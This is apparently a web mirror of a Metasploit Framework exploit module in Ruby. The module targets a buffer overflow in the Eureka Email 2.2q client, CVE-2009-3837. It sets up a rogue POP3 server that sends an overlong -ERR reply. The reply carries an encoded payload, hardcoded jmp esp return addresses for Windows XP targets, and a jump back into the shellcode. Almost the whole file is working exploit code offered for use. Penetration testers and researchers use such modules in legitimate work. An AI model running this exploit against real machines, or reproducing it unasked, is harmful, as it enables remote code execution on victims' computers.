Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/eureka_mail_err.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Eureka Email 2.2q ERR Remote Buffer Overflow',

16
        # bof occurs due to wsprintfA @ 0x43bdf2 in "Eureka Mail.exe" v2.2.0.1

17
        # overflows a buffer of 512 bytes, smashes a buffer of 256 bytes, then the return address

18
        'Description' => %q{

19
          This module exploits a buffer overflow in the Eureka Email 2.2q

20
          client that is triggered through an excessively long ERR message.

21


22
          NOTE: this exploit isn't very reliable. Unfortunately reaching the

23
          vulnerable code can only be done when manually checking mail (Ctrl-M).

24
          Checking at startup will not reach the code targeted here.

25
        },

26
        'Author' => [

27
          'Francis Provencher (Protek Research Labs)',

28
          'Dr_IDE',

29
          'dookie',

30
          'jduck'

31
        ],

32
        'License' => MSF_LICENSE,

33
        'References' => [

34
          [ 'CVE', '2009-3837' ],

35
          [ 'OSVDB', '59262' ],

36
          [ 'EDB', '10235' ],

37
        ],

38
        'DefaultOptions' => {

39
          'EXITFUNC' => 'process',

40
        },

41
        'Payload' => {

42
          'Space' => 700,

43
          'BadChars' => "\x00\x0a\x0d\x20",

44
          'StackAdjustment' => -3500,

45
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

46
          'DisableNops' => true,

47
        },

48
        'Platform' => 'win',

49
        'Targets' => [

50
          [ 'Win XP SP3 English',	{ 'Ret' => 0x7E429353 } ], # jmp esp / user32.dll

51
          [ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp / user32.dll

52
        ],

53
        'Privileged' => false,

54
        'DefaultTarget' => 0,

55
        'DisclosureDate' => '2009-10-22',

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_options(

65
      [

66
        OptPort.new('SRVPORT', [ true, "The POP3 daemon port to listen on", 110 ]),

67
      ]

68
    )

69
  end

70


71
  def on_client_connect(client)

72
    return unless regenerate_payload(client)

73


74
    # the offset to eip depends on the local ip address string length...

75
    already = "Your POP3 server had a problem.\n"

76
    already << datastore['LHOST']

77
    already << " said:\n\n    -ERR "

78
    space = (512 + 256 + 4) - already.length

79


80
    buffer = "-ERR "

81
    buffer << make_nops(space - payload.encoded.length)

82
    buffer << payload.encoded

83
    buffer << [target.ret].pack('V')

84
    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0x2c0").encode_string

85
    buffer << "\r\n"

86


87
    print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")

88
    client.put(buffer)

89


90
    handler

91
    service.close_client(client)

92
  end

93
end

94


95